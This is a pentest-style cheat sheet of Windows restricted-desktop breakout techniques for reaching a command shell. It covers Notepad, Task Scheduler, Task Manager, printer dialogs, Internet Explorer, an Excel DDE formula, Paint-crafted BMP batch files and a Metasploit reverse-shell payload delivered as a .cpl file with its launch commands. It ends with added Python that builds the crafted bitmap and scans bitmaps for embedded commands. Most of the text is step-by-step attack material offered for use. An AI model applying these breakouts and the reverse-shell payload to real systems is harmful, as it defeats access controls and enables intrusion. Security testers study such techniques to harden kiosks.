Windows utilities

Windows utilities that can be used to bypass restrictions

Credit: https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

Notepad

We can try creating a new text file, saving it as file.bat with the content cmd.exe, and double-clicking the file; a cmd window will open.

Cortana

McAfee uncovered and documented the security flaws in a lengthy blog post, with one simple issue being the fact that you could trigger the voice assistant from the lock screen (assuming Cortana is enabled in this respect, on default settings), and bring up a contextual Windows 10 menu simply by typing while Cortana is listening to a query.

Simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below.

Task Scheduler

An interesting weakness: some systems prevent access to cmd.exe, but it can still be scheduled to run via Task Scheduler. This can be done either via the command-line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (e.g. 1 minute in the future) or upon certain events, such as when a user logs on.

We can use it to run PowerShell from the following path when a user logs out and logs back in:

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Task Manager

Task Manager: Ctrl+Shift+Esc -> File -> Run new task

Printer

Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe

Internet Explorer

Get a cmd shell from Internet Explorer:

Address Bar

Enter in address bar:

file://C:\Windows\System32\cmd.exe

Developer Tools

Developer Tools: press F12 -> Performance tab -> click the 3rd icon, "Import profile session"

Excel

Get a cmd.exe shell using Excel:

Place this in a cell and press Enter:

=cmd|' /k cmd.exe'!'A1'

Windows Search

Get a cmd.exe or PowerShell shell using Windows Search:

Press the Windows key and type the name of the program. Note that admins frequently block cmd.exe and PowerShell but forget to block PowerShell ISE.

Shortcuts

Try shortcuts:

Shift x 5 = Sticky Keys

Alt + F4 = shut down computer

Win + R = Run

Ctrl + Shift + Esc = Task Manager

Ctrl + Alt + Delete = help menu (Task Manager, change password, etc.)

Control Panel

Generating a simple x64 reverse shell in .cpl format:

use windows/local/cve_2017_8464_lnk_lpe 
set payload windows/x64/shell_reverse_tcp 

Invoking the shellcode via control.exe:

control.exe .\FlashPlayerCPLApp.cpl

# or

rundll32.exe shell32.dll,Control_RunDLL file.cpl

# or

rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl

Paint

An unusual yet effective method of gaining a shell: create a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Because of the way BMP files are encoded (each pixel's colour values are written to the file as raw bytes), it is possible to dictate the ASCII data written into the file by carefully selecting certain RGB colours.

Open mspaint.exe and set the canvas size to Width=6 and Height=1 pixels.

Zoom in to make the following steps easier.

Using the colour picker, set the pixel values (from left to right) to:

1st: R: 10, G: 0, B: 0 
2nd: R: 13, G: 10, B: 13 
3rd: R: 100, G: 109, B: 99 
4th: R: 120, G: 101, B: 46 
5th: R: 0, G: 0, B: 101 
6th: R: 0, G: 0, B: 0 

Save it as 24-bit Bitmap (*.bmp;*.dib).

Change its extension from bmp to bat and run.
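To see why exactly these colours work, and to check bitmaps for this kind of content, here is an added example (not code from the original page or from the cited blog). build_bmp encodes pixels the way Paint saves a 24-bit BMP (54-byte header, rows bottom-up, bytes in B,G,R order, rows padded to 4 bytes), and script_lines is a defensive helper that lists any printable command lines sitting in a bitmap's pixel array; the function names are my own.

```python
import struct

# The six colours from the Paint steps above, left to right, as (R, G, B).
PAINT_PIXELS = [(10, 0, 0), (13, 10, 13), (100, 109, 99),
                (120, 101, 46), (0, 0, 101), (0, 0, 0)]


def build_bmp(rows):
    """Encode pixel rows (top row first, each a list of (R, G, B)) as a
    24-bit BMP the way Paint saves one: 54-byte header, then the pixel
    array stored bottom-up, each pixel as B,G,R bytes, each row padded
    with NULs to a multiple of 4 bytes. Constructed here for the demo."""
    width, height = len(rows[0]), len(rows)
    row_size = (width * 3 + 3) & ~3
    data = b"".join(
        b"".join(bytes((b, g, r)) for r, g, b in row).ljust(row_size, b"\0")
        for row in reversed(rows))
    file_header = struct.pack("<2sIHHI", b"BM", 54 + len(data), 0, 0, 54)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                              len(data), 2835, 2835, 0, 0)
    return file_header + info_header + data


def pixel_array(bmp):
    """Return the pixel array of a BMP using the data offset in its header
    (these are the bytes that follow the header when cmd.exe reads the
    file as a .bat and steps through it line by line)."""
    offset = struct.unpack_from("<I", bmp, 10)[0]
    return bmp[offset:]


def embedded_text(bmp):
    """Decode the pixel array as text with NUL padding removed, which shows
    what the B,G,R bytes of each colour spell out."""
    return pixel_array(bmp).replace(b"\0", b"").decode("ascii", "replace")


def script_lines(bmp):
    """Defensive check: lines in the pixel array made only of printable
    ASCII. A normal picture yields none; a crafted one yields commands."""
    return [line for line in embedded_text(bmp).splitlines()
            if line and all(32 <= ord(c) < 127 for c in line)]
```

With the page's six colours the pixel array decodes to a few blank lines followed by "cmd.exe", which is the line the batch interpreter ends up running; an all-white canvas yields no printable lines at all.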
